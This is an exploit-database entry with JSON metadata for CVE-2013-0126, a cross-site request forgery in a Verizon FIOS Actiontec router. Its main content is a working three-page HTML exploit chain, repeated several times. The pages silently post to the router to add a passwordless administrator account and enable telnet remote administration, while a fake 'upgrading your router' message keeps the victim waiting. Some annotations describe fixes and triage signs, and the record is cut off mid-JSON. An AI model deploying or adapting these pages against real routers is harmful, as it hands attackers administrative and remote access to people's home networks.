ID 1337DAY-ID-20527
Type zdt
Reporter Jacob Holcomb
Modified 2013-03-19T00:00:00
Description
Advisory/Video: http://infosec42.blogspot.com/2013/03/verizon-fios-router-csrf-cve-2013-0126.html
US CERT Disclosure: http://www.kb.cert.org/vuls/id/278204
Exploit Code:
HTML FILE #1
<!--
  Proof of concept, page 1 of 3, for CVE-2013-0126: cross-site request forgery
  against index.cgi on the router's web management interface.
  Loading this page makes the browser send the hidden POST below to 192.168.1.1.
  Every field is a fixed value, so the request contains nothing that only the
  router's own admin page could know. The CERT advisory on this page states the
  precondition: the user must be logged into the router at that moment.
  Firmware-side fix this points to: require an unpredictable per-session token
  on state-changing requests and reject POSTs with a foreign Origin/Referer.
  Workarounds listed by CERT: log out of the management interface when done and
  keep it unreachable from untrusted networks.
-->
<html>
<title>Cisco Verizon FIOS CSRF - Adding Administrator User</title>
<!-- NOTE(review): the title and the next comment say Cisco; the NVD and CERT
     entries on this page identify the device as the Verizon FIOS Actiontec
     MI424WR-GEN3I. -->
<!--Cisco Model: MI424WR-GEN3I -->
<!--Firmware Version: 40.19.36 -->
<!-- Pretext text shown to the victim while the timers below run, presumably to
     keep the tab open. The heading sits before the body element, which
     browsers tolerate. -->
<h1>Please sit tight while we upgrade your router</h1>
<body>
<!-- Add-user request for the User Settings page (active_page 101). Per the NVD
     description, username and user_level are the parameters through which an
     administrative account is added. user_id -1 presumably means "new user";
     the meaning of user_level 2 is not documented on this page. No password
     field is sent. For triage: an account named G42 / g42 that nobody created
     indicates this request reached the device. -->
<form name="verizonCisco" action="http://192.168.1.1/index.cgi" method="post">
<input type="hidden" name="active_page" value="101"/>
<input type="hidden" name="page_title" value="User Settings"/>
<input type="hidden" name="mimic_button_field" value="submit_button_submit: .."/>
<input type="hidden" name="button_value" value="."/>
<input type="hidden" name="strip_page_top" value="0"/>
<input type="hidden" name="user_id" value="-1"/>
<input type="hidden" name="fullname_defval" value=""/>
<input type="hidden" name="fullname" value="g42"/>
<input type="hidden" name="username_defval" value=""/>
<input type="hidden" name="username" value="G42"/>
<input type="hidden" name="user_level" value="2"/>
<input type="hidden" name="email_system_notify_level" value="15"/>
<input type="hidden" name="email_security_notify_level" value="15"/>
</form>
<!-- Both timers fire 1000 ms after load with no user interaction: CSRF1 opens
     page 2 of the chain from 10.0.1.101 (a private address, presumably the
     author's test host) and CSRF2 submits the form above. -->
<script>
function CSRF1() {window.open("http://10.0.1.101/verizonFIOS2.html");};window.setTimeout(CSRF1,1000)
function CSRF2() {document.verizonCisco.submit();};window.setTimeout(CSRF2,1000)
</script>
</body>
</html>
HTML FILE #2
<!--
  Proof of concept, page 2 of 3, for CVE-2013-0126. It posts a second fixed
  request to the same User Settings page (active_page 101) on index.cgi.
  Going by the title and the submit_button_confirm_submit value, this presumably
  answers the router's confirmation prompt for saving a user without a password.
  The prompt itself is not shown on this page, so confirm against the advisory.
  Review point: a confirmation step that a second forged POST can answer is not
  a CSRF defence unless the confirmation carries an unpredictable token.
-->
<html>
<title>Cisco Verizon FIOS CSRF2 - Add User w/ No Pass Confirmation</title>
<body>
<!-- Only navigation and button fields are sent; no user data and no secret. -->
<form name="verizonCiscoC" action="http://192.168.1.1/index.cgi" method="post">
<input type="hidden" name="active_page" value="101"/>
<input type="hidden" name="page_title" value="User Settings"/>
<input type="hidden" name="mimic_button_field" value="submit_button_confirm_submit: .."/>
<input type="hidden" name="button_value" value="."/>
<input type="hidden" name="strip_page_top" value="0"/>
</form>
<!-- CSRF1 opens page 3 of the chain from 10.0.1.101 and CSRF2 submits the form
     above. The delay is written as 0500, which non-strict JavaScript reads as a
     legacy octal literal (decimal 320), so both timers run after 320 ms rather
     than 500 ms. -->
<script>
function CSRF1() {window.open("http://10.0.1.101/verizonFIOS3.html");};window.setTimeout(CSRF1,0500)
function CSRF2() {document.verizonCiscoC.submit();};window.setTimeout(CSRF2,0500)
</script>
</body>
</html>
HTML FILE #3
<!--
  Proof of concept, page 3 of 3, for CVE-2013-0126. It posts to the Remote
  Administration page (active_page 9078, page_remote_admin) on index.cgi.
  Per the NVD description, is_telnet_primary and is_telnet_secondary are the
  parameters that enable remote administration; both are set to 1 here.
  For triage: telnet remote administration enabled on a router whose owner never
  turned it on is the visible result of this request. Telnet is a cleartext
  protocol, so these options should stay off regardless.
-->
<html>
<title>Cisco Verizon FIOS CSRF3 - Enable Remote Administration</title>
<body>
<!-- Every *_defval field is 0; presumably these carry the previous (disabled)
     state of each remote-access option. Only the two telnet options are sent
     with value 1. As in the other requests, no field holds a secret. -->
<form name="verizonCiscoRemote" action="http://192.168.1.1/index.cgi" method="post">
<input type="hidden" name="active_page" value="9078"/>
<input type="hidden" name="active_page_str" value="page_remote_admin"/>
<input type="hidden" name="page_title" value="Remote Administration"/>
<input type="hidden" name="mimic_button_field" value="submit_button_submit: .."/>
<input type="hidden" name="button_value" value=""/>
<input type="hidden" name="strip_page_top" value="0"/>
<input type="hidden" name="is_telnet_primary" value="1"/>
<input type="hidden" name="is_telnet_primary_defval" value="0"/>
<input type="hidden" name="is_telnet_secondary_defval" value="0"/>
<input type="hidden" name="is_telnet_ssl_defval" value="0"/>
<input type="hidden" name="is_http_primary_defval" value="0"/>
<input type="hidden" name="is_http_secondary_defval" value="0"/>
<input type="hidden" name="is_https_primary_defval" value="0"/>
<input type="hidden" name="is_https_secondary_defval" value="0"/>
<input type="hidden" name="is_diagnostics_icmp_defval" value="0"/>
<input type="hidden" name="is_diagnostics_traceroute_defval" value="0"/>
<input type="hidden" name="is_telnet_secondary" value="1"/>
</form>
<!-- The single timer uses a delay of 0000 (zero), so the form is submitted as
     soon as the page has loaded, with no user interaction. -->
<script>
function CSRF1() {document.verizonCiscoRemote.submit();};window.setTimeout(CSRF1,0000)
</script>
</body>
</html>
# 0day.today [2018-03-28] #
{"hash": "506cded81adbade10280b8e17a7d98cf6e7a6d6caf0ba66ec6391d0bbd23fac5", "id": "1337DAY-ID-20527", "lastseen": "2018-03-28T03:22:05", "viewCount": 12, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "8b5d0d8cc30b20fa709b5b6b868dc203", "key": "cvelist"}, {"hash": "737e2591b537c46d1ca7ce6f0cea5cb9", "key": "cvss"}, {"hash": "c28357326906695c780d7d594d4ded3f", "key": "description"}, {"hash": "e800dd4914a08841b8b12421a500fbd5", "key": "href"}, {"hash": "16b14757497194f5e0d23e1b9ce47c6b", "key": "modified"}, {"hash": "16b14757497194f5e0d23e1b9ce47c6b", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "fa253720cd589555dc8773efd677be5e", "key": "reporter"}, {"hash": "145f3a0906114990572e95dd9caf38f8", "key": "sourceData"}, {"hash": "d7e353c6c87065a43a921f616984b025", "key": "sourceHref"}, {"hash": "a68900fae06ca575f7241bf0d00e43cf", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "bulletinFamily": "exploit", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "edition": 2, "enchantments": {"score": {"value": 6.7, "vector": "NONE", "modified": "2018-03-28T03:22:05"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2013-0126"]}, {"type": "seebug", "idList": ["SSV:78547"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:120869"]}, {"type": "cert", "idList": ["VU:278204"]}, {"type": "zdt", "idList": ["1337DAY-ID-20537"]}, {"type": "exploitdb", "idList": ["EDB-ID:24860"]}], "modified": "2018-03-28T03:22:05"}, "vulnersScore": 6.7}, "type": "zdt", "sourceHref": "https://0day.today/exploit/20527", "description": "Advisory/Video: http://infosec42.blogspot.com/2013/03/verizon-fios-router-csrf-cve-2013-0126.html", "title": "Verizon Fios Router MI424WR-GEN3I - CSRF Vulnerability", "history": [{"bulletin": {"hash": "556c7538d2f60e481b2498e782ce639dea4db20ebff6e02e82e8e39cb9710a6a", "id": 
"1337DAY-ID-20527", "lastseen": "2016-04-20T02:12:44", "enchantments": {"score": {"value": 0.0, "vector": "AV:N/AC:M/Au:M/C:N/I:N/A:N/", "modified": "2016-04-20T02:12:44"}}, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "16b14757497194f5e0d23e1b9ce47c6b", "key": "published"}, {"hash": "a68900fae06ca575f7241bf0d00e43cf", "key": "title"}, {"hash": "471a0066db6e967991c4c95da0eb5020", "key": "sourceHref"}, {"hash": "c28357326906695c780d7d594d4ded3f", "key": "description"}, {"hash": "3da40e1c86c3e5f825532db41b60edb1", "key": "sourceData"}, {"hash": "8b5d0d8cc30b20fa709b5b6b868dc203", "key": "cvelist"}, {"hash": "fa253720cd589555dc8773efd677be5e", "key": "reporter"}, {"hash": "737e2591b537c46d1ca7ce6f0cea5cb9", "key": "cvss"}, {"hash": "16b14757497194f5e0d23e1b9ce47c6b", "key": "modified"}, {"hash": "84b362d7117dcbe238e8935f96297b73", "key": "href"}], "bulletinFamily": "exploit", "history": [], "edition": 1, "type": "zdt", "sourceHref": "http://0day.today/exploit/20527", "description": "Advisory/Video: http://infosec42.blogspot.com/2013/03/verizon-fios-router-csrf-cve-2013-0126.html", "viewCount": 4, "title": "Verizon Fios Router MI424WR-GEN3I - CSRF Vulnerability", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "objectVersion": "1.0", "cvelist": ["CVE-2013-0126"], "sourceData": "US CERT Disclosure: http://www.kb.cert.org/vuls/id/278204\r\n \r\nExploit Code:\r\n \r\nHTML FILE #1\r\n \r\n<html>\r\n<title>Cisco Verizon FIOS CSRF - Adding Administrator User</title>\r\n<!--Cisco Model: MI424WR-GEN3I -->\r\n<!--Firmware Version: 40.19.36 -->\r\n<h1>Please sit tight while we upgrade your router</h1>\r\n \r\n<body>\r\n \r\n<form name=\"verizonCisco\" action=\"http://192.168.1.1/index.cgi\" method=\"post\">\r\n<input type=\"hidden\" name=\"active_page\" 
value=\"101\"/>\r\n<input type=\"hidden\" name=\"page_title\" value=\"User Settings\"/>\r\n<input type=\"hidden\" name=\"mimic_button_field\" value=\"submit_button_submit: ..\"/>\r\n<input type=\"hidden\" name=\"button_value\" value=\".\"/>\r\n<input type=\"hidden\" name=\"strip_page_top\" value=\"0\"/>\r\n<input type=\"hidden\" name=\"user_id\" value=\"-1\"/>\r\n<input type=\"hidden\" name=\"fullname_defval\" value=\"\"/>\r\n<input type=\"hidden\" name=\"fullname\" value=\"g42\"/>\r\n<input type=\"hidden\" name=\"username_defval\" value=\"\"/>\r\n<input type=\"hidden\" name=\"username\" value=\"G42\"/>\r\n<input type=\"hidden\" name=\"user_level\" value=\"2\"/>\r\n<input type=\"hidden\" name=\"email_system_notify_level\" value=\"15\"/>\r\n<input type=\"hidden\" name=\"email_security_notify_level\" value=\"15\"/>\r\n</form>\r\n \r\n<script>\r\nfunction CSRF1() {window.open(\"http://10.0.1.101/verizonFIOS2.html\");};window.setTimeout(CSRF1,1000)\r\nfunction CSRF2() {document.verizonCisco.submit();};window.setTimeout(CSRF2,1000)\r\n</script>\r\n \r\n</body>\r\n</html>\r\n \r\nHTML FILE #2\r\n \r\n<html>\r\n<title>Cisco Verizon FIOS CSRF2 - Add User w/ No Pass Confirmation</title>\r\n \r\n<body>\r\n \r\n<form name=\"verizonCiscoC\" action=\"http://192.168.1.1/index.cgi\" method=\"post\">\r\n<input type=\"hidden\" name=\"active_page\" value=\"101\"/>\r\n<input type=\"hidden\" name=\"page_title\" value=\"User Settings\"/>\r\n<input type=\"hidden\" name=\"mimic_button_field\" value=\"submit_button_confirm_submit: ..\"/>\r\n<input type=\"hidden\" name=\"button_value\" value=\".\"/>\r\n<input type=\"hidden\" name=\"strip_page_top\" value=\"0\"/>\r\n</form>\r\n \r\n<script>\r\nfunction CSRF1() {window.open(\"http://10.0.1.101/verizonFIOS3.html\");};window.setTimeout(CSRF1,0500)\r\nfunction CSRF2() {document.verizonCiscoC.submit();};window.setTimeout(CSRF2,0500)\r\n</script>\r\n \r\n</body>\r\n</html>\r\n \r\nHTML FILE #3\r\n \r\n <html>\r\n<title>Cisco Verizon FIOS CSRF3 - 
Enable Remote Administration</title>\r\n \r\n<body>\r\n \r\n<form name=\"verizonCiscoRemote\" action=\"http://192.168.1.1/index.cgi\" method=\"post\">\r\n<input type=\"hidden\" name=\"active_page\" value=\"9078\"/>\r\n<input type=\"hidden\" name=\"active_page_str\" value=\"page_remote_admin\"/>\r\n<input type=\"hidden\" name=\"page_title\" value=\"Remote Administration\"/>\r\n<input type=\"hidden\" name=\"mimic_button_field\" value=\"submit_button_submit: ..\"/>\r\n<input type=\"hidden\" name=\"button_value\" value=\"\"/>\r\n<input type=\"hidden\" name=\"strip_page_top\" value=\"0\"/>\r\n<input type=\"hidden\" name=\"is_telnet_primary\" value=\"1\"/>\r\n<input type=\"hidden\" name=\"is_telnet_primary_defval\" value=\"0\"/>\r\n<input type=\"hidden\" name=\"is_telnet_secondary_defval\" value=\"0\"/>\r\n<input type=\"hidden\" name=\"is_telnet_ssl_defval\" value=\"0\"/>\r\n<input type=\"hidden\" name=\"is_http_primary_defval\" value=\"0\"/>\r\n<input type=\"hidden\" name=\"is_http_secondary_defval\" value=\"0\"/>\r\n<input type=\"hidden\" name=\"is_https_primary_defval\" value=\"0\"/>\r\n<input type=\"hidden\" name=\"is_https_secondary_defval\" value=\"0\"/>\r\n<input type=\"hidden\" name=\"is_diagnostics_icmp_defval\" value=\"0\"/>\r\n<input type=\"hidden\" name=\"is_diagnostics_traceroute_defval\" value=\"0\"/>\r\n<input type=\"hidden\" name=\"is_telnet_secondary\" value=\"1\"/>\r\n</form>\r\n \r\n<script>\r\nfunction CSRF1() {document.verizonCiscoRemote.submit();};window.setTimeout(CSRF1,0000)\r\n</script>\r\n \r\n</body>\r\n</html>\n\n# 0day.today [2016-04-20] #", "published": "2013-03-19T00:00:00", "references": [], "reporter": "Jacob Holcomb", "modified": "2013-03-19T00:00:00", "href": "http://0day.today/exploit/description/20527"}, "lastseen": "2016-04-20T02:12:44", "edition": 1, "differentElements": ["sourceHref", "sourceData", "href"]}], "objectVersion": "1.3", "cvelist": ["CVE-2013-0126"], "sourceData": "US CERT Disclosure: 
http://www.kb.cert.org/vuls/id/278204\r\n \r\nExploit Code:\r\n \r\nHTML FILE #1\r\n \r\n<html>\r\n<title>Cisco Verizon FIOS CSRF - Adding Administrator User</title>\r\n<!--Cisco Model: MI424WR-GEN3I -->\r\n<!--Firmware Version: 40.19.36 -->\r\n<h1>Please sit tight while we upgrade your router</h1>\r\n \r\n<body>\r\n \r\n<form name=\"verizonCisco\" action=\"http://192.168.1.1/index.cgi\" method=\"post\">\r\n<input type=\"hidden\" name=\"active_page\" value=\"101\"/>\r\n<input type=\"hidden\" name=\"page_title\" value=\"User Settings\"/>\r\n<input type=\"hidden\" name=\"mimic_button_field\" value=\"submit_button_submit: ..\"/>\r\n<input type=\"hidden\" name=\"button_value\" value=\".\"/>\r\n<input type=\"hidden\" name=\"strip_page_top\" value=\"0\"/>\r\n<input type=\"hidden\" name=\"user_id\" value=\"-1\"/>\r\n<input type=\"hidden\" name=\"fullname_defval\" value=\"\"/>\r\n<input type=\"hidden\" name=\"fullname\" value=\"g42\"/>\r\n<input type=\"hidden\" name=\"username_defval\" value=\"\"/>\r\n<input type=\"hidden\" name=\"username\" value=\"G42\"/>\r\n<input type=\"hidden\" name=\"user_level\" value=\"2\"/>\r\n<input type=\"hidden\" name=\"email_system_notify_level\" value=\"15\"/>\r\n<input type=\"hidden\" name=\"email_security_notify_level\" value=\"15\"/>\r\n</form>\r\n \r\n<script>\r\nfunction CSRF1() {window.open(\"http://10.0.1.101/verizonFIOS2.html\");};window.setTimeout(CSRF1,1000)\r\nfunction CSRF2() {document.verizonCisco.submit();};window.setTimeout(CSRF2,1000)\r\n</script>\r\n \r\n</body>\r\n</html>\r\n \r\nHTML FILE #2\r\n \r\n<html>\r\n<title>Cisco Verizon FIOS CSRF2 - Add User w/ No Pass Confirmation</title>\r\n \r\n<body>\r\n \r\n<form name=\"verizonCiscoC\" action=\"http://192.168.1.1/index.cgi\" method=\"post\">\r\n<input type=\"hidden\" name=\"active_page\" value=\"101\"/>\r\n<input type=\"hidden\" name=\"page_title\" value=\"User Settings\"/>\r\n<input type=\"hidden\" name=\"mimic_button_field\" value=\"submit_button_confirm_submit: 
..\"/>\r\n<input type=\"hidden\" name=\"button_value\" value=\".\"/>\r\n<input type=\"hidden\" name=\"strip_page_top\" value=\"0\"/>\r\n</form>\r\n \r\n<script>\r\nfunction CSRF1() {window.open(\"http://10.0.1.101/verizonFIOS3.html\");};window.setTimeout(CSRF1,0500)\r\nfunction CSRF2() {document.verizonCiscoC.submit();};window.setTimeout(CSRF2,0500)\r\n</script>\r\n \r\n</body>\r\n</html>\r\n \r\nHTML FILE #3\r\n \r\n <html>\r\n<title>Cisco Verizon FIOS CSRF3 - Enable Remote Administration</title>\r\n \r\n<body>\r\n \r\n<form name=\"verizonCiscoRemote\" action=\"http://192.168.1.1/index.cgi\" method=\"post\">\r\n<input type=\"hidden\" name=\"active_page\" value=\"9078\"/>\r\n<input type=\"hidden\" name=\"active_page_str\" value=\"page_remote_admin\"/>\r\n<input type=\"hidden\" name=\"page_title\" value=\"Remote Administration\"/>\r\n<input type=\"hidden\" name=\"mimic_button_field\" value=\"submit_button_submit: ..\"/>\r\n<input type=\"hidden\" name=\"button_value\" value=\"\"/>\r\n<input type=\"hidden\" name=\"strip_page_top\" value=\"0\"/>\r\n<input type=\"hidden\" name=\"is_telnet_primary\" value=\"1\"/>\r\n<input type=\"hidden\" name=\"is_telnet_primary_defval\" value=\"0\"/>\r\n<input type=\"hidden\" name=\"is_telnet_secondary_defval\" value=\"0\"/>\r\n<input type=\"hidden\" name=\"is_telnet_ssl_defval\" value=\"0\"/>\r\n<input type=\"hidden\" name=\"is_http_primary_defval\" value=\"0\"/>\r\n<input type=\"hidden\" name=\"is_http_secondary_defval\" value=\"0\"/>\r\n<input type=\"hidden\" name=\"is_https_primary_defval\" value=\"0\"/>\r\n<input type=\"hidden\" name=\"is_https_secondary_defval\" value=\"0\"/>\r\n<input type=\"hidden\" name=\"is_diagnostics_icmp_defval\" value=\"0\"/>\r\n<input type=\"hidden\" name=\"is_diagnostics_traceroute_defval\" value=\"0\"/>\r\n<input type=\"hidden\" name=\"is_telnet_secondary\" value=\"1\"/>\r\n</form>\r\n \r\n<script>\r\nfunction CSRF1() 
{document.verizonCiscoRemote.submit();};window.setTimeout(CSRF1,0000)\r\n</script>\r\n \r\n</body>\r\n</html>\n\n# 0day.today [2018-03-28] #", "published": "2013-03-19T00:00:00", "references": [], "reporter": "Jacob Holcomb", "modified": "2013-03-19T00:00:00", "href": "https://0day.today/exploit/description/20527"}
{"cve": [{"lastseen": "2019-05-29T18:12:59", "bulletinFamily": "NVD", "description": "Multiple cross-site request forgery (CSRF) vulnerabilities in index.cgi on the Verizon FIOS Actiontec MI424WR-GEN3I router with firmware 40.19.36 allow remote attackers to hijack the authentication of administrators for requests that (1) add administrative accounts via the username and user_level parameters or (2) enable remote administration via the is_telnet_primary and is_telnet_secondary parameters.", "modified": "2013-10-07T20:31:00", "id": "CVE-2013-0126", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0126", "published": "2013-03-21T20:55:00", "title": "CVE-2013-0126", "type": "cve", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "seebug": [{"lastseen": "2017-11-19T16:45:44", "bulletinFamily": "exploit", "description": "No description provided by source.", "modified": "2014-07-01T00:00:00", "published": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-78547", "id": "SSV:78547", "title": "Verizon Fios Router MI424WR-GEN3I - CSRF Vulnerability", "type": "seebug", "sourceData": "\n # Exploit Title: Verizon Fios Router CSRF Admin Shell \r\n# Date: Discovered and reported January 2013\r\n# Author: Jacob Holcomb/Gimppy - Security Analyst @ Independent Security Evaluators\r\n# Software: Verizon FIOS Router - Firmware 40.19.36 (http://verizon.com)\r\n# CVE: CVE-2013-0126\r\n# Advisory/Video: http://infosec42.blogspot.com/2013/03/verizon-fios-router-csrf-cve-2013-0126.html\r\n\r\nUS CERT Disclosure: http://www.kb.cert.org/vuls/id/278204\r\n\r\nExploit Code:\r\n\r\nHTML FILE #1\r\n\r\n<html>\r\n<title>Cisco Verizon FIOS CSRF - Adding Administrator User</title>\r\n<!--Cisco Model: MI424WR-GEN3I -->\r\n<!--Firmware Version: 40.19.36 -->\r\n<h1>Please sit tight while we upgrade your router</h1>\r\n\r\n<body>\r\n\r\n<form name="verizonCisco" action="http://192.168.1.1/index.cgi" method="post">\r\n<input type="hidden" 
name="active_page" value="101"/>\r\n<input type="hidden" name="page_title" value="User Settings"/>\r\n<input type="hidden" name="mimic_button_field" value="submit_button_submit: .."/>\r\n<input type="hidden" name="button_value" value="."/>\r\n<input type="hidden" name="strip_page_top" value="0"/>\r\n<input type="hidden" name="user_id" value="-1"/>\r\n<input type="hidden" name="fullname_defval" value=""/>\r\n<input type="hidden" name="fullname" value="g42"/>\r\n<input type="hidden" name="username_defval" value=""/>\r\n<input type="hidden" name="username" value="G42"/>\r\n<input type="hidden" name="user_level" value="2"/>\r\n<input type="hidden" name="email_system_notify_level" value="15"/>\r\n<input type="hidden" name="email_security_notify_level" value="15"/>\r\n</form>\r\n\r\n<script>\r\nfunction CSRF1() {window.open("http://10.0.1.101/verizonFIOS2.html");};window.setTimeout(CSRF1,1000)\r\nfunction CSRF2() {document.verizonCisco.submit();};window.setTimeout(CSRF2,1000)\r\n</script>\r\n\r\n</body>\r\n</html>\r\n\r\nHTML FILE #2\r\n\r\n<html>\r\n<title>Cisco Verizon FIOS CSRF2 - Add User w/ No Pass Confirmation</title>\r\n\r\n<body>\r\n\r\n<form name="verizonCiscoC" action="http://192.168.1.1/index.cgi" method="post">\r\n<input type="hidden" name="active_page" value="101"/>\r\n<input type="hidden" name="page_title" value="User Settings"/>\r\n<input type="hidden" name="mimic_button_field" value="submit_button_confirm_submit: .."/>\r\n<input type="hidden" name="button_value" value="."/>\r\n<input type="hidden" name="strip_page_top" value="0"/>\r\n</form>\r\n\r\n<script>\r\nfunction CSRF1() {window.open("http://10.0.1.101/verizonFIOS3.html");};window.setTimeout(CSRF1,0500)\r\nfunction CSRF2() {document.verizonCiscoC.submit();};window.setTimeout(CSRF2,0500)\r\n</script>\r\n\r\n</body>\r\n</html>\r\n\r\nHTML FILE #3\r\n\r\n <html>\r\n<title>Cisco Verizon FIOS CSRF3 - Enable Remote Administration</title>\r\n\r\n<body>\r\n\r\n<form name="verizonCiscoRemote" 
action="http://192.168.1.1/index.cgi" method="post">\r\n<input type="hidden" name="active_page" value="9078"/>\r\n<input type="hidden" name="active_page_str" value="page_remote_admin"/>\r\n<input type="hidden" name="page_title" value="Remote Administration"/>\r\n<input type="hidden" name="mimic_button_field" value="submit_button_submit: .."/>\r\n<input type="hidden" name="button_value" value=""/>\r\n<input type="hidden" name="strip_page_top" value="0"/>\r\n<input type="hidden" name="is_telnet_primary" value="1"/>\r\n<input type="hidden" name="is_telnet_primary_defval" value="0"/>\r\n<input type="hidden" name="is_telnet_secondary_defval" value="0"/>\r\n<input type="hidden" name="is_telnet_ssl_defval" value="0"/>\r\n<input type="hidden" name="is_http_primary_defval" value="0"/>\r\n<input type="hidden" name="is_http_secondary_defval" value="0"/>\r\n<input type="hidden" name="is_https_primary_defval" value="0"/>\r\n<input type="hidden" name="is_https_secondary_defval" value="0"/>\r\n<input type="hidden" name="is_diagnostics_icmp_defval" value="0"/>\r\n<input type="hidden" name="is_diagnostics_traceroute_defval" value="0"/>\r\n<input type="hidden" name="is_telnet_secondary" value="1"/>\r\n</form>\r\n\r\n<script>\r\nfunction CSRF1() {document.verizonCiscoRemote.submit();};window.setTimeout(CSRF1,0000)\r\n</script>\r\n\r\n</body>\r\n</html>\r\n\n ", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-78547"}], "packetstorm": [{"lastseen": "2016-12-05T22:14:57", "bulletinFamily": "exploit", "description": "", "modified": "2013-03-19T00:00:00", "published": "2013-03-19T00:00:00", "href": "https://packetstormsecurity.com/files/120869/Verizon-Fios-Router-MI424WR-GEN3I-CSRF.html", "id": "PACKETSTORM:120869", "type": "packetstorm", "title": "Verizon Fios Router MI424WR-GEN3I CSRF", "sourceData": "`# Exploit Title: Verizon Fios Router CSRF Admin Shell \n# Date: Discovered and reported 
January 2013 \n# Author: Jacob Holcomb/Gimppy - Security Analyst @ Independent Security Evaluators \n# Software: Verizon FIOS Router - Firmware 40.19.36 (http://verizon.com) \n# CVE: CVE-2013-0126 \n# Advisory/Video: http://infosec42.blogspot.com/2013/03/verizon-fios-router-csrf-cve-2013-0126.html \n \nUS CERT Disclosure: http://www.kb.cert.org/vuls/id/278204 \n \nExploit Code: \n \nHTML FILE #1 \n \n<html> \n<title>Cisco Verizon FIOS CSRF - Adding Administrator User</title> \n<!--Cisco Model: MI424WR-GEN3I --> \n<!--Firmware Version: 40.19.36 --> \n<h1>Please sit tight while we upgrade your router</h1> \n \n<body> \n \n<form name=\"verizonCisco\" action=\"http://192.168.1.1/index.cgi\" method=\"post\"> \n<input type=\"hidden\" name=\"active_page\" value=\"101\"/> \n<input type=\"hidden\" name=\"page_title\" value=\"User Settings\"/> \n<input type=\"hidden\" name=\"mimic_button_field\" value=\"submit_button_submit: ..\"/> \n<input type=\"hidden\" name=\"button_value\" value=\".\"/> \n<input type=\"hidden\" name=\"strip_page_top\" value=\"0\"/> \n<input type=\"hidden\" name=\"user_id\" value=\"-1\"/> \n<input type=\"hidden\" name=\"fullname_defval\" value=\"\"/> \n<input type=\"hidden\" name=\"fullname\" value=\"g42\"/> \n<input type=\"hidden\" name=\"username_defval\" value=\"\"/> \n<input type=\"hidden\" name=\"username\" value=\"G42\"/> \n<input type=\"hidden\" name=\"user_level\" value=\"2\"/> \n<input type=\"hidden\" name=\"email_system_notify_level\" value=\"15\"/> \n<input type=\"hidden\" name=\"email_security_notify_level\" value=\"15\"/> \n</form> \n \n<script> \nfunction CSRF1() {window.open(\"http://10.0.1.101/verizonFIOS2.html\");};window.setTimeout(CSRF1,1000) \nfunction CSRF2() {document.verizonCisco.submit();};window.setTimeout(CSRF2,1000) \n</script> \n \n</body> \n</html> \n \nHTML FILE #2 \n \n<html> \n<title>Cisco Verizon FIOS CSRF2 - Add User w/ No Pass Confirmation</title> \n \n<body> \n \n<form name=\"verizonCiscoC\" 
action=\"http://192.168.1.1/index.cgi\" method=\"post\"> \n<input type=\"hidden\" name=\"active_page\" value=\"101\"/> \n<input type=\"hidden\" name=\"page_title\" value=\"User Settings\"/> \n<input type=\"hidden\" name=\"mimic_button_field\" value=\"submit_button_confirm_submit: ..\"/> \n<input type=\"hidden\" name=\"button_value\" value=\".\"/> \n<input type=\"hidden\" name=\"strip_page_top\" value=\"0\"/> \n</form> \n \n<script> \nfunction CSRF1() {window.open(\"http://10.0.1.101/verizonFIOS3.html\");};window.setTimeout(CSRF1,0500) \nfunction CSRF2() {document.verizonCiscoC.submit();};window.setTimeout(CSRF2,0500) \n</script> \n \n</body> \n</html> \n \nHTML FILE #3 \n \n<html> \n<title>Cisco Verizon FIOS CSRF3 - Enable Remote Administration</title> \n \n<body> \n \n<form name=\"verizonCiscoRemote\" action=\"http://192.168.1.1/index.cgi\" method=\"post\"> \n<input type=\"hidden\" name=\"active_page\" value=\"9078\"/> \n<input type=\"hidden\" name=\"active_page_str\" value=\"page_remote_admin\"/> \n<input type=\"hidden\" name=\"page_title\" value=\"Remote Administration\"/> \n<input type=\"hidden\" name=\"mimic_button_field\" value=\"submit_button_submit: ..\"/> \n<input type=\"hidden\" name=\"button_value\" value=\"\"/> \n<input type=\"hidden\" name=\"strip_page_top\" value=\"0\"/> \n<input type=\"hidden\" name=\"is_telnet_primary\" value=\"1\"/> \n<input type=\"hidden\" name=\"is_telnet_primary_defval\" value=\"0\"/> \n<input type=\"hidden\" name=\"is_telnet_secondary_defval\" value=\"0\"/> \n<input type=\"hidden\" name=\"is_telnet_ssl_defval\" value=\"0\"/> \n<input type=\"hidden\" name=\"is_http_primary_defval\" value=\"0\"/> \n<input type=\"hidden\" name=\"is_http_secondary_defval\" value=\"0\"/> \n<input type=\"hidden\" name=\"is_https_primary_defval\" value=\"0\"/> \n<input type=\"hidden\" name=\"is_https_secondary_defval\" value=\"0\"/> \n<input type=\"hidden\" name=\"is_diagnostics_icmp_defval\" value=\"0\"/> \n<input type=\"hidden\" 
